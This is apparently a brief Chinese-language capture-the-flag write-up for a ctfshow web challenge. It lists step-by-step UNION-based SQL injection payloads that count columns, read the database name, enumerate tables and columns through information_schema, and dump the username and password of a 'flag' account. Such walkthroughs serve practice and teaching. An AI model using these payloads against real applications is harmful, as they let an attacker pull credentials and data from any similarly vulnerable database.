首先查询有多少列，1' order by 3--+

 然后查询库名 1' union select 1,2,database() --+

 查看ctfshow_web库的表

1' union select 1,2, table_name from information_schema.tables where table_schema ='ctfshow_web' --+

 获取表名

1' union select 1,2, table_name from information_schema.tables where table_schema =database() --+

获取列名

1' union select 1,2, column_name from information_schema.columns where table_schema =database() and table_name='ctfshow_user' --+

 查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+

获得flag